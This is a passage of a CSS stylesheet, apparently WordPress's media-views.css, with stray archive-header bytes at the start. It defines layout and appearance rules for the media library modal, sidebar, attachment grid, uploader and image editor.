???PK! media-views.cssnuȯ/** * Base Styles */ .media-modal * { box-sizing: content-box; } .media-modal input, .media-modal select, .media-modal textarea { box-sizing: border-box; } .media-modal, .media-frame { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; font-size: 12px; -webkit-overflow-scrolling: touch; } .media-modal legend { padding: 0; font-size: 13px; } .media-modal label { font-size: 13px; } .media-modal .legend-inline { position: absolute; transform: translate(-100%, 50%); margin-left: -1%; line-height: 1.2; } .media-frame a { border-bottom: none; color: #2271b1; } .media-frame a:hover, .media-frame a:active { color: #135e96; } .media-frame a:focus { box-shadow: 0 0 0 2px #2271b1; color: #043959; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .media-frame a.button { color: #2c3338; } .media-frame a.button:hover { color: #1d2327; } .media-frame a.button-primary, .media-frame a.button-primary:hover { color: #fff; } .media-frame input, .media-frame textarea { padding: 6px 8px; } .media-frame select, .wp-admin .media-frame select { min-height: 30px; vertical-align: middle; } .media-frame input[type="text"], .media-frame input[type="password"], .media-frame input[type="color"], .media-frame input[type="date"], .media-frame input[type="datetime"], .media-frame input[type="datetime-local"], .media-frame input[type="email"], .media-frame input[type="month"], .media-frame input[type="number"], .media-frame input[type="search"], .media-frame input[type="tel"], .media-frame input[type="time"], .media-frame input[type="url"], .media-frame input[type="week"], .media-frame textarea, .media-frame select { box-shadow: 0 0 0 transparent; border-radius: 4px; border: 1px solid #8c8f94; background-color: #fff; color: #2c3338; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; font-size: 13px; line-height: 1.38461538; } .media-frame input[type="text"], .media-frame input[type="password"], .media-frame input[type="date"], .media-frame input[type="datetime"], .media-frame input[type="datetime-local"], .media-frame input[type="email"], .media-frame input[type="month"], .media-frame input[type="number"], .media-frame input[type="search"], .media-frame input[type="tel"], .media-frame input[type="time"], .media-frame input[type="url"], .media-frame input[type="week"] { padding: 0 8px; /* inherits font size 13px */ line-height: 2.15384615; /* 28px */ } /* Search field in the Media Library toolbar */ .media-frame.mode-grid .wp-filter input[type="search"] { font-size: 14px; line-height: 2; } .media-frame input[type="text"]:focus, .media-frame input[type="password"]:focus, .media-frame input[type="number"]:focus, .media-frame input[type="search"]:focus, .media-frame input[type="email"]:focus, .media-frame input[type="url"]:focus, .media-frame textarea:focus, .media-frame select:focus { border-color: #3582c4; box-shadow: 0 0 0 1px #3582c4; outline: 2px solid transparent; } .media-frame input:disabled, .media-frame textarea:disabled, .media-frame input[readonly], .media-frame textarea[readonly] { background-color: #f0f0f1; } .media-frame input[type="search"] { -webkit-appearance: textfield; } .media-frame ::-webkit-input-placeholder { color: #646970; } .media-frame ::-moz-placeholder { color: #646970; } /* * In some cases there's the need of higher specificity, * for example higher than `.media-embed .setting`. */ .media-frame .hidden, .media-frame .setting.hidden { display: none; } /*! * jQuery UI Draggable/Sortable 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */ .ui-draggable-handle, .ui-sortable-handle { touch-action: none; } /** * Modal */ .media-modal { position: fixed; top: 30px; left: 30px; right: 30px; bottom: 30px; z-index: 160000; } .wp-customizer .media-modal { z-index: 560000; } .media-modal-backdrop { position: fixed; top: 0; left: 0; right: 0; bottom: 0; min-height: 360px; background: #000; opacity: 0.7; z-index: 159900; } .wp-customizer .media-modal-backdrop { z-index: 559900; } .media-modal-close { position: absolute; top: 0; right: 0; width: 50px; height: 50px; margin: 0; padding: 0; border: 1px solid transparent; background: none; color: #646970; z-index: 1000; cursor: pointer; outline: none; transition: color .1s ease-in-out, background .1s ease-in-out; } .media-modal-close:hover, .media-modal-close:active { color: #135e96; } .media-modal-close:focus { color: #135e96; border-color: #4f94d4; box-shadow: 0 0 3px rgba(34, 113, 177, 0.8); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .media-modal-close span.media-modal-icon { background-image: none; } .media-modal-close .media-modal-icon:before { content: "\f158"; content: "\f158" / ''; font: normal 20px/1 dashicons; vertical-align: middle; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .media-modal-content { position: absolute; top: 0; left: 0; right: 0; bottom: 0; overflow: auto; min-height: 300px; box-shadow: 0 5px 15px rgba(0, 0, 0, 0.7); background: #fff; -webkit-font-smoothing: subpixel-antialiased; } .media-modal-content .media-frame select.attachment-filters { margin-top: 32px; margin-right: 2%; width: 42%; width: calc(48% - 12px); } /* higher specificity */ .wp-core-ui .media-modal-icon { background-image: url(../images/uploader-icons.png); background-repeat: no-repeat; } /** * Toolbar */ .media-toolbar { position: absolute; top: 0; left: 0; right: 0; z-index: 100; height: 60px; padding: 0 16px; border: 0 solid #dcdcde; overflow: hidden; } .media-frame-toolbar .media-toolbar { top: auto; bottom: -47px; height: auto; overflow: visible; border-top: 1px solid #dcdcde; } .media-toolbar-primary { float: right; height: 100%; position: relative; } .media-toolbar-secondary { float: left; height: 100%; } .media-toolbar-primary > .media-button, .media-toolbar-primary > .media-button-group { margin-left: 10px; float: left; margin-top: 15px; } .media-toolbar-secondary > .media-button, .media-toolbar-secondary > .media-button-group { margin-right: 10px; margin-top: 15px; } /** * Sidebar */ .media-sidebar { position: absolute; top: 0; right: 0; bottom: 0; width: 267px; padding: 0 16px; z-index: 75; background: #f6f7f7; border-left: 1px solid #dcdcde; overflow: auto; -webkit-overflow-scrolling: touch; } /* * Implementation of bottom padding in overflow content differs across browsers. * We need a different method. See https://github.com/w3c/csswg-drafts/issues/129 */ .media-sidebar::after { content: ""; display: flex; clear: both; height: 24px; } .hide-toolbar .media-sidebar { bottom: 0; } .media-sidebar h2, .image-details .media-embed h2 { position: relative; font-weight: 600; text-transform: uppercase; font-size: 12px; color: #646970; margin: 24px 0 8px; } .media-sidebar .setting, .attachment-details .setting { display: block; float: left; width: 100%; margin: 0 0 10px; } .attachment-details h2 { display: grid; grid-template-columns: auto 5em; } .media-sidebar .collection-settings .setting { margin: 1px 0; } .media-sidebar .setting.has-description, .attachment-details .setting.has-description { margin-bottom: 5px; } .media-sidebar .setting .link-to-custom { margin: 3px 2px 0; } .media-sidebar .setting span, /* Back-compat for pre-5.3 */ .attachment-details .setting span, /* Back-compat for pre-5.3 */ .media-sidebar .setting .name, .media-sidebar .setting .value, .attachment-details .setting .name { min-width: 30%; margin-right: 4%; font-size: 12px; text-align: right; word-wrap: break-word; } .media-sidebar .setting .name { max-width: 80px; } .media-sidebar .setting .value { text-align: left; } .media-sidebar .setting select { max-width: 65%; } .media-sidebar .setting input[type="checkbox"], .media-sidebar .field input[type="checkbox"], .media-sidebar .setting input[type="radio"], .media-sidebar .field input[type="radio"], .attachment-details .setting input[type="checkbox"], .attachment-details .field input[type="checkbox"], .attachment-details .setting input[type="radio"], .attachment-details .field input[type="radio"] { float: none; margin: 8px 3px 0; padding: 0; } .media-sidebar .setting span, /* Back-compat for pre-5.3 */ .attachment-details .setting span, /* Back-compat for pre-5.3 */ .media-sidebar .setting .name, .media-sidebar .setting .value, .media-sidebar .checkbox-label-inline, .attachment-details .setting .name, .attachment-details .setting .value, .compat-item label span { float: left; min-height: 22px; padding-top: 8px; line-height: 1.33333333; font-weight: 400; color: #646970; } .media-sidebar .checkbox-label-inline { font-size: 12px; } .media-sidebar .copy-to-clipboard-container, .attachment-details .copy-to-clipboard-container { flex-wrap: wrap; margin-top: 10px; margin-left: calc( 35% - 1px ); padding-top: 10px; } /* Needs high specificity. */ .attachment-details .attachment-info .copy-to-clipboard-container { float: none; } .media-sidebar .copy-to-clipboard-container .success, .attachment-details .copy-to-clipboard-container .success { padding: 0; min-height: 0; line-height: 2.18181818; text-align: left; color: #007017; } .compat-item label span { text-align: right; } .media-sidebar .setting input[type="text"], .media-sidebar .setting input[type="password"], .media-sidebar .setting input[type="email"], .media-sidebar .setting input[type="number"], .media-sidebar .setting input[type="search"], .media-sidebar .setting input[type="tel"], .media-sidebar .setting input[type="url"], .media-sidebar .setting textarea, .media-sidebar .setting .value, .attachment-details .setting input[type="text"], .attachment-details .setting input[type="password"], .attachment-details .setting input[type="email"], .attachment-details .setting input[type="number"], .attachment-details .setting input[type="search"], .attachment-details .setting input[type="tel"], .attachment-details .setting input[type="url"], .attachment-details .setting textarea, .attachment-details .setting .value, .attachment-details .setting + .description { box-sizing: border-box; margin: 1px; width: 65%; float: right; } .media-sidebar .setting .value, .attachment-details .setting .value, .attachment-details .setting + .description { margin: 0 1px; text-align: left; } .attachment-details .setting + .description { clear: both; font-size: 12px; font-style: normal; margin-bottom: 10px; } .media-sidebar .setting textarea, .attachment-details .setting textarea, .compat-item .field textarea { height: 62px; resize: vertical; } .media-sidebar .alt-text textarea, .attachment-details .alt-text textarea, .compat-item .alt-text textarea, .alt-text textarea { height: 50px; } .compat-item { float: left; width: 100%; overflow: hidden; } .compat-item table { width: 100%; table-layout: fixed; border-spacing: 0; border: 0; } .compat-item tr { padding: 2px 0; display: block; overflow: hidden; } .compat-item .label, .compat-item .field { display: block; margin: 0; padding: 0; } .compat-item .label { min-width: 30%; margin-right: 4%; float: left; text-align: right; } .compat-item .label span { display: block; width: 100%; } .compat-item .field { float: right; width: 65%; margin: 1px; } .compat-item .field input[type="text"], .compat-item .field input[type="password"], .compat-item .field input[type="email"], .compat-item .field input[type="number"], .compat-item .field input[type="search"], .compat-item .field input[type="tel"], .compat-item .field input[type="url"], .compat-item .field textarea { width: 100%; margin: 0; box-sizing: border-box; } .sidebar-for-errors .attachment-details, .sidebar-for-errors .compat-item, .sidebar-for-errors .media-sidebar .media-progress-bar, .sidebar-for-errors .upload-details { display: none !important; } /** * Menu */ .media-menu { position: absolute; top: 0; left: 0; right: 0; bottom: 0; margin: 0; padding: 50px 0 10px; background: #f6f7f7; border-right-width: 1px; border-right-style: solid; border-right-color: #c3c4c7; -webkit-user-select: none; user-select: none; } .media-menu .media-menu-item { display: block; box-sizing: border-box; width: 100%; position: relative; border: 0; margin: 0; padding: 8px 20px; font-size: 14px; line-height: 1.28571428; background: transparent; color: #2271b1; text-align: left; text-decoration: none; cursor: pointer; } .media-menu .media-menu-item:hover { background: rgba(0, 0, 0, 0.04); } .media-menu .media-menu-item:active { color: #2271b1; outline: none; } .media-menu .active, .media-menu .active:hover { color: #1d2327; font-weight: 600; } .media-menu .media-menu-item:focus { box-shadow: 0 0 0 2px #2271b1; color: #043959; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .media-menu .separator { height: 0; margin: 12px 20px; padding: 0; border-top: 1px solid #dcdcde; } /** * Menu */ .media-router { position: relative; padding: 0 6px; margin: 0; clear: both; } .media-router .media-menu-item { position: relative; float: left; border: 0; margin: 0; padding: 8px 10px 9px; height: 18px; line-height: 1.28571428; font-size: 14px; text-decoration: none; background: transparent; cursor: pointer; transition: none; } .media-router .media-menu-item:last-child { border-right: 0; } .media-router .media-menu-item:hover, .media-router .media-menu-item:active { color: #2271b1; } .media-router .active, .media-router .active:hover { color: #1d2327; } .media-router .media-menu-item:focus { box-shadow: 0 0 0 2px #2271b1; color: #043959; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; z-index: 1; } .media-router .active, .media-router .media-menu-item.active:last-child { margin: -1px -1px 0; background: #fff; border: 1px solid #dcdcde; border-bottom: none; } .media-router .active:after { display: none; } /** * Frame */ .media-frame { overflow: hidden; position: absolute; top: 0; left: 0; right: 0; bottom: 0; } .media-frame-menu { position: absolute; top: 0; left: 0; bottom: 0; width: 200px; z-index: 150; } .media-frame-title { position: absolute; top: 0; left: 200px; right: 0; height: 50px; z-index: 200; } .media-frame-router { position: absolute; top: 50px; left: 200px; right: 0; height: 36px; z-index: 200; } .media-frame-content { position: absolute; top: 84px; left: 200px; right: 0; bottom: 61px; height: auto; width: auto; margin: 0; overflow: auto; background: #fff; border-top: 1px solid #dcdcde; } .media-frame-toolbar { position: absolute; left: 200px; right: 0; z-index: 100; bottom: 60px; height: auto; } .media-frame.hide-menu .media-frame-title, .media-frame.hide-menu .media-frame-router, .media-frame.hide-menu .media-frame-toolbar, .media-frame.hide-menu .media-frame-content { left: 0; } .media-frame.hide-toolbar .media-frame-content { bottom: 0; } .media-frame.hide-router .media-frame-content { top: 50px; } .media-frame.hide-menu .media-frame-menu, .media-frame.hide-menu .media-frame-menu-heading, .media-frame.hide-router .media-frame-router, .media-frame.hide-toolbar .media-frame-toolbar { display: none; } .media-frame-title h1 { padding: 0 16px; font-size: 22px; line-height: 2.27272727; margin: 0; } .media-frame-menu-heading, .media-attachments-filter-heading { position: absolute; left: 20px; top: 22px; margin: 0; font-size: 13px; line-height: 1; /* Above the media-frame-menu. */ z-index: 151; } .media-attachments-filter-heading { top: 10px; left: 16px; } .mode-grid .media-attachments-filter-heading { top: 0; left: -9999px; } .mode-grid .media-frame-actions-heading { display: none; } .wp-core-ui .button.media-frame-menu-toggle { display: none; } .media-frame-title .suggested-dimensions { font-size: 14px; float: right; margin-right: 20px; } .media-frame-content .crop-content { height: 100%; } .options-general-php .crop-content.site-icon, .wp-customizer:not(.mobile) .media-frame-content .crop-content.site-icon { margin-right: 300px; } .media-frame-content .crop-content .crop-image { display: block; margin: auto; max-width: 100%; max-height: 100%; } .media-frame-content .crop-content .upload-errors { position: absolute; width: 300px; top: 50%; left: 50%; margin-left: -150px; margin-right: -150px; z-index: 600000; } /** * Iframes */ .media-frame .media-iframe { overflow: hidden; } .media-frame .media-iframe, .media-frame .media-iframe iframe { height: 100%; width: 100%; border: 0; } /** * Attachment Browser Filters */ .media-frame select.attachment-filters { margin-top: 11px; margin-right: 2%; max-width: 42%; max-width: calc(48% - 12px); } .media-frame select.attachment-filters:last-of-type { margin-right: 0; } /** * Search */ .media-frame .search { margin: 32px 0 0; padding: 4px; font-size: 13px; color: #3c434a; font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif; -webkit-appearance: none; } .media-toolbar-primary .search { max-width: 100%; } .media-modal .media-frame .media-search-input-label { position: absolute; left: 0; top: 10px; margin: 0; line-height: 1; } /** * Attachments */ .wp-core-ui .attachments { margin: 0; -webkit-overflow-scrolling: touch; } /** * Attachment */ .wp-core-ui .attachment { position: relative; float: left; padding: 8px; margin: 0; color: #3c434a; cursor: pointer; list-style: none; text-align: center; -webkit-user-select: none; user-select: none; width: 25%; box-sizing: border-box; } .wp-core-ui .attachment:focus, .wp-core-ui .selected.attachment:focus, .wp-core-ui .attachment.details:focus { box-shadow: inset 0 0 2px 3px #fff, inset 0 0 0 7px #4f94d4; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; outline-offset: -6px; } .wp-core-ui .selected.attachment { box-shadow: inset 0 0 0 5px #fff, inset 0 0 0 7px #c3c4c7; } .wp-core-ui .attachment.details { box-shadow: inset 0 0 0 3px #fff, inset 0 0 0 7px #2271b1; } .wp-core-ui .attachment-preview { position: relative; box-shadow: inset 0 0 15px rgba(0, 0, 0, 0.1), inset 0 0 0 1px rgba(0, 0, 0, 0.05); background: #f0f0f1; cursor: pointer; } .wp-core-ui .attachment-preview:before { content: ""; display: block; padding-top: 100%; } .wp-core-ui .attachment .icon { margin: 0 auto; overflow: hidden; } .wp-core-ui .attachment .thumbnail { overflow: hidden; position: absolute; top: 0; right: 0; bottom: 0; left: 0; opacity: 1; transition: opacity .1s; } .wp-core-ui .attachment .portrait img { max-width: 100%; } .wp-core-ui .attachment .landscape img { max-height: 100%; } .wp-core-ui .attachment .thumbnail:after { content: ""; display: block; position: absolute; top: 0; left: 0; right: 0; bottom: 0; box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.1); overflow: hidden; } .wp-core-ui .attachment .thumbnail img { top: 0; left: 0; } .wp-core-ui .attachment .thumbnail .centered { position: absolute; top: 0; left: 0; width: 100%; height: 100%; transform: translate( 50%, 50% ); } .wp-core-ui .attachment .thumbnail .centered img { transform: translate( -50%, -50% ); } .wp-core-ui .attachments-browser .attachment .thumbnail .centered img.icon { transform: translate( -50%, -70% ); } .wp-core-ui .attachment .filename { position: absolute; left: 0; right: 0; bottom: 0; overflow: hidden; max-height: 100%; word-wrap: break-word; text-align: center; font-weight: 600; background: rgba(255, 255, 255, 0.8); box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.15); } .wp-core-ui .attachment .filename div { padding: 5px 10px; } .wp-core-ui .attachment .thumbnail img { position: absolute; } .wp-core-ui .attachment-close { display: block; position: absolute; top: 5px; right: 5px; height: 22px; width: 22px; padding: 0; background-color: #fff; border-radius: 3px; box-shadow: 0 0 0 1px rgba(0, 0, 0, 0.3); transition: none; } .wp-core-ui .attachment-close .media-modal-icon { display: inline-block; background-position: -96px 4px; height: 22px; width: 22px; } .wp-core-ui .attachment-close:hover .media-modal-icon, .wp-core-ui .attachment-close:focus .media-modal-icon { background-position: -36px 4px; } .wp-core-ui .attachment .check { display: none; height: 24px; width: 24px; padding: 0; border: 0; position: absolute; z-index: 10; top: 0; right: 0; outline: none; background: #f0f0f1; cursor: pointer; box-shadow: 0 0 0 1px #fff, 0 0 0 2px rgba(0, 0, 0, 0.15); } .wp-core-ui .attachment .check .media-modal-icon { display: block; background-position: -1px 0; height: 15px; width: 15px; margin: 5px; } .wp-core-ui .attachment .check:hover .media-modal-icon { background-position: -40px 0; } .wp-core-ui .attachment.selected .check { display: block; } .wp-core-ui .attachment.details .check, .wp-core-ui .attachment.selected .check:focus, .wp-core-ui .media-frame.mode-grid .attachment.selected .check { background-color: #2271b1; box-shadow: 0 0 0 1px #fff, 0 0 0 2px #2271b1; } .wp-core-ui .attachment.selected .check:focus { /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .wp-core-ui .attachment.details .check .media-modal-icon, .wp-core-ui .media-frame.mode-grid .attachment.selected .check .media-modal-icon { background-position: -21px 0; } .wp-core-ui .attachment.details .check:hover .media-modal-icon, .wp-core-ui .attachment.selected .check:focus .media-modal-icon, .wp-core-ui .media-frame.mode-grid .attachment.selected .check:hover .media-modal-icon { background-position: -60px 0; } .wp-core-ui .media-frame .attachment .describe { position: relative; display: block; width: 100%; margin: 0; padding: 0 8px; font-size: 12px; border-radius: 0; } /** * Attachments Browser */ .media-frame .attachments-browser { position: relative; width: 100%; height: 100%; overflow: hidden; } .attachments-browser .media-toolbar { right: 300px; height: 72px; background: #fff; } .attachments-browser.hide-sidebar .media-toolbar { right: 0; } .attachments-browser .media-toolbar-primary > .media-button, .attachments-browser .media-toolbar-primary > .media-button-group, .attachments-browser .media-toolbar-secondary > .media-button, .attachments-browser .media-toolbar-secondary > .media-button-group { margin: 10px 0; } .attachments-browser .attachments { padding: 2px 8px 8px; } .attachments-browser:not(.has-load-more) .attachments, .attachments-browser.has-load-more .attachments-wrapper, .attachments-browser .uploader-inline { position: absolute; top: 72px; left: 0; right: 300px; bottom: 0; overflow: auto; outline: none; } .attachments-browser .uploader-inline.hidden { display: none; } .attachments-browser .media-toolbar-primary { max-width: 33%; } .mode-grid .attachments-browser .media-toolbar-primary { display: flex; align-items: center; column-gap: .5rem; margin: 11px 0; } .mode-grid .attachments-browser .media-toolbar-mode-select .media-toolbar-primary { display: none; } .attachments-browser .media-toolbar-secondary { max-width: 66%; } .uploader-inline .close { background-color: transparent; border: 0; cursor: pointer; height: 48px; outline: none; padding: 0; position: absolute; right: 2px; text-align: center; top: 2px; width: 48px; z-index: 1; } .uploader-inline .close:before { font: normal 30px/1 dashicons !important; color: #50575e; display: inline-block; content: "\f335"; content: "\f335" / ''; font-weight: 300; margin-top: 1px; } .uploader-inline .close:focus { outline: 1px solid #4f94d4; box-shadow: 0 0 3px rgba(34, 113, 177, 0.8); } .attachments-browser.hide-sidebar .attachments, .attachments-browser.hide-sidebar .uploader-inline { right: 0; margin-right: 0; } .attachments-browser .instructions { display: inline-block; margin-top: 16px; line-height: 1.38461538; font-size: 13px; color: #646970; } .attachments-browser .no-media { padding: 2em 0 0 2em; } .more-loaded .attachment:not(.found-media) { background: #dcdcde; } .load-more-wrapper { clear: both; display: flex; flex-wrap: wrap; align-items: center; justify-content: center; padding: 1em 0; } .load-more-wrapper .load-more-count { min-width: 100%; margin: 0 0 1em; text-align: center; } .load-more-wrapper .load-more { margin: 0; } /* Needs high specificity. */ .media-frame .load-more-wrapper .load-more + .spinner { float: none; margin: 0 -30px 0 10px; } /* Reset spinner margin when the button is hidden to avoid horizontal scrollbar. */ .media-frame .load-more-wrapper .load-more.hidden + .spinner { margin: 0; } /* Force a new row within the flex container. */ .load-more-wrapper::after { content: ""; min-width: 100%; order: 1; } .load-more-wrapper .load-more-jump { margin: 0 0 0 12px; } .attachment.new-media { outline: 2px dotted #c3c4c7; } /** * Progress Bar */ .media-progress-bar { position: relative; height: 10px; width: 70%; margin: 10px auto; border-radius: 10px; background: #dcdcde; background: rgba(0, 0, 0, 0.1); } .media-progress-bar div { height: 10px; min-width: 20px; width: 0; background: #2271b1; border-radius: 10px; transition: width 300ms; } .media-uploader-status .media-progress-bar { display: none; width: 100%; } .uploading.media-uploader-status .media-progress-bar { display: block; } .attachment-preview .media-progress-bar { position: absolute; top: 50%; left: 15%; width: 70%; margin: -5px 0 0; } .media-uploader-status { position: relative; margin: 0 auto; padding-bottom: 10px; max-width: 400px; } .uploader-inline .media-uploader-status h2 { display: none; } .media-uploader-status .upload-details { display: none; font-size: 12px; color: #646970; } .uploading.media-uploader-status .upload-details { display: block; } .media-uploader-status .upload-detail-separator { padding: 0 4px; } .media-uploader-status .upload-count { color: #3c434a; } .media-uploader-status .upload-dismiss-errors, .media-uploader-status .upload-errors { display: none; } .errors.media-uploader-status .upload-dismiss-errors, .errors.media-uploader-status .upload-errors { display: block; } .media-uploader-status .upload-dismiss-errors { transition: none; text-decoration: none; } .upload-errors .upload-error { padding: 12px; margin-bottom: 12px; background: #fff; border-left: 4px solid #d63638; box-shadow: 0 1px 1px 0 rgba(0, 0, 0, 0.1); } .uploader-inline .upload-errors .upload-error { padding: 12px 30px; background-color: #fcf0f1; box-shadow: none; } .upload-errors .upload-error-filename { font-weight: 600; } .upload-errors .upload-error-message { display: block; padding-top: 8px; word-wrap: break-word; } /** * Window and Editor uploaders used to display "drop zones" */ .uploader-window, .wp-editor-wrap .uploader-editor { top: 0; left: 0; right: 0; bottom: 0; text-align: center; display: none; } .uploader-window { position: fixed; z-index: 250000; opacity: 0; /* Only the inline uploader is animated with JS, the editor one isn't */ transition: opacity 250ms; } .wp-editor-wrap .uploader-editor { position: absolute; z-index: 99998; /* under the toolbar */ background: rgba(140, 143, 148, 0.9); } .uploader-window, .wp-editor-wrap .uploader-editor.droppable { background: rgba(10, 75, 120, 0.9); } .uploader-window-content, .wp-editor-wrap .uploader-editor-content { position: absolute; top: 10px; left: 10px; right: 10px; bottom: 10px; border: 1px dashed #fff; } /* uploader drop-zone title */ .uploader-window h1, /* Back-compat for pre-5.3 */ .uploader-window .uploader-editor-title, .wp-editor-wrap .uploader-editor .uploader-editor-title { position: absolute; top: 50%; left: 0; right: 0; transform: translateY(-50%); font-size: 3em; line-height: 1.3; font-weight: 600; color: #fff; margin: 0; padding: 0 10px; } .wp-editor-wrap .uploader-editor .uploader-editor-title { display: none; } .wp-editor-wrap .uploader-editor.droppable .uploader-editor-title { display: block; } .uploader-window .media-progress-bar { margin-top: 20px; max-width: 300px; background: transparent; border-color: #fff; display: none; } .uploader-window .media-progress-bar div { background: #fff; } .uploading .uploader-window .media-progress-bar { display: block; } .media-frame .uploader-inline { margin-bottom: 20px; padding: 0; text-align: center; } .uploader-inline-content { position: absolute; top: 30%; left: 0; right: 0; } .uploader-inline-content .upload-ui { margin: 2em 0; } .uploader-inline-content .post-upload-ui { margin-bottom: 2em; } .uploader-inline .has-upload-message .upload-ui { margin: 0 0 4em; } .uploader-inline h2 { font-size: 20px; line-height: 1.4; font-weight: 400; margin: 0; } .uploader-inline .has-upload-message .upload-instructions { font-size: 14px; color: #3c434a; font-weight: 400; } .uploader-inline .drop-instructions { display: none; } .supports-drag-drop .uploader-inline .drop-instructions { display: block; } .uploader-inline p { margin: 0.5em 0; } .uploader-inline .media-progress-bar { display: none; } .uploading.uploader-inline .media-progress-bar { display: block; } .uploader-inline .browser { display: inline-block !important; } /** * Selection */ .media-selection { position: absolute; top: 0; left: 0; right: 350px; height: 60px; padding: 0 0 0 16px; overflow: hidden; white-space: nowrap; } .media-selection .selection-info { display: inline-block; font-size: 12px; height: 60px; margin-right: 10px; vertical-align: top; } .media-selection.empty, .media-selection.editing { display: none; } .media-selection.one .edit-selection { display: none; } .media-selection .count { display: block; padding-top: 12px; font-size: 14px; line-height: 1.42857142; font-weight: 600; } .media-selection .button-link { float: left; padding: 1px 8px; margin: 1px 8px 1px -8px; line-height: 1.4; border-right: 1px solid #dcdcde; color: #2271b1; text-decoration: none; } .media-selection .button-link:hover, .media-selection .button-link:focus { color: #135e96; } .media-selection .button-link:last-child { border-right: 0; margin-right: 0; } .selection-info .clear-selection { color: #d63638; } .selection-info .clear-selection:hover, .selection-info .clear-selection:focus { color: #d63638; } .media-selection .selection-view { display: inline-block; vertical-align: top; } .media-selection .attachments { display: inline-block; height: 48px; margin: 6px; padding: 0; overflow: hidden; vertical-align: top; } .media-selection .attachment { width: 40px; padding: 0; margin: 4px; } .media-selection .attachment .thumbnail { top: 0; right: 0; bottom: 0; left: 0; } .media-selection .attachment .icon { width: 50%; } .media-selection .attachment-preview { box-shadow: none; background: none; } .wp-core-ui .media-selection .attachment:focus, .wp-core-ui .media-selection .selected.attachment:focus, .wp-core-ui .media-selection .attachment.details:focus { box-shadow: 0 0 0 1px #fff, 0 0 2px 3px #4f94d4; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .wp-core-ui .media-selection .selected.attachment { box-shadow: none; } .wp-core-ui .media-selection .attachment.details { box-shadow: 0 0 0 1px #fff, 0 0 0 3px #2271b1; } .media-selection:after { content: ""; display: block; position: absolute; top: 0; right: 0; bottom: 0; width: 25px; background-image: linear-gradient(to left,#fff,rgba(255, 255, 255, 0)); } .media-selection .attachment .filename { display: none; } /** * Spinner */ .media-frame .spinner { background: url(../images/spinner.gif) no-repeat; background-size: 20px 20px; float: right; display: inline-block; visibility: hidden; opacity: 0.7; filter: alpha(opacity=70); width: 20px; height: 20px; margin: 0; vertical-align: middle; } .media-frame .media-sidebar .settings-save-status .spinner { position: absolute; right: 0; top: 0; } .media-frame.mode-grid .spinner { margin: 0; float: none; vertical-align: middle; } .media-modal .media-toolbar .spinner { float: none; vertical-align: bottom; margin: 0 0 5px 5px; } .media-frame .instructions + .spinner.is-active { vertical-align: middle; } .media-frame .spinner.is-active { visibility: visible; } /** * Attachment Details */ .attachment-details { position: relative; overflow: auto; } .attachment-details .settings-save-status { text-align: right; text-transform: none; font-weight: 400; } .attachment-details .settings-save-status .spinner { float: none; margin-left: 5px; } .attachment-details .settings-save-status .saved { display: none; } .attachment-details.save-waiting .settings-save-status .spinner { visibility: visible; } .attachment-details.save-complete .settings-save-status .saved { display: inline-block; } .attachment-info { overflow: hidden; min-height: 60px; margin-bottom: 16px; line-height: 1.5; color: #646970; border-bottom: 1px solid #dcdcde; padding-bottom: 11px; } .attachment-info .wp-media-wrapper { margin-bottom: 8px; } .attachment-info .wp-media-wrapper.wp-audio { margin-top: 13px; } .attachment-info .filename { font-weight: 600; color: #3c434a; word-wrap: break-word; } .attachment-info .thumbnail { position: relative; float: left; max-width: 120px; max-height: 120px; margin-top: 5px; margin-right: 10px; margin-bottom: 5px; } .uploading .attachment-info .thumbnail { width: 120px; height: 80px; box-shadow: inset 0 0 15px rgba(0, 0, 0, 0.1); } .uploading .attachment-info .media-progress-bar { margin-top: 35px; } .attachment-info .thumbnail-image:after { content: ""; display: block; position: absolute; top: 0; left: 0; right: 0; bottom: 0; box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.15); overflow: hidden; } .attachment-info .thumbnail img { display: block; max-width: 120px; max-height: 120px; margin: 0 auto; } .attachment-info .details { float: left; font-size: 12px; max-width: 100%; } .attachment-info .edit-attachment, .attachment-info .delete-attachment, .attachment-info .trash-attachment, .attachment-info .untrash-attachment { display: block; text-decoration: none; white-space: nowrap; } .attachment-details.needs-refresh .attachment-info .edit-attachment { display: none; } .attachment-info .edit-attachment { display: block; } .media-modal .delete-attachment, .media-modal .trash-attachment, .media-modal .untrash-attachment { display: inline; padding: 0; color: #d63638; } .media-modal .delete-attachment:hover, .media-modal .delete-attachment:focus, .media-modal .trash-attachment:hover, .media-modal .trash-attachment:focus, .media-modal .untrash-attachment:hover, .media-modal .untrash-attachment:focus { color: #d63638; } /** * Attachment Display Settings */ .attachment-display-settings { width: 100%; float: left; overflow: hidden; } .collection-settings { overflow: hidden; } .collection-settings .setting input[type="checkbox"] { float: left; margin-right: 8px; } .collection-settings .setting span, /* Back-compat for pre-5.3 */ .collection-settings .setting .name { min-width: inherit; } /** * Image Editor */ .media-modal .imgedit-wrap { position: static; } .media-modal .imgedit-wrap .imgedit-panel-content { padding: 16px 16px 0; overflow: visible; } /* * Implementation of bottom padding in overflow content differs across browsers. * We need a different method. See https://github.com/w3c/csswg-drafts/issues/129 */ .media-modal .imgedit-wrap .imgedit-save-target { margin: 8px 0 24px; } .media-modal .imgedit-group { background: none; border: none; box-shadow: none; margin: 0; padding: 0; position: relative; /* RTL fix, #WP29352 */ } .media-modal .imgedit-group.imgedit-panel-active { margin-bottom: 16px; padding-bottom: 16px; } .media-modal .imgedit-group-top { margin: 0; } .media-modal .imgedit-group-top h2, .media-modal .imgedit-group-top h2 .button-link { display: inline-block; text-transform: uppercase; font-size: 12px; color: #646970; 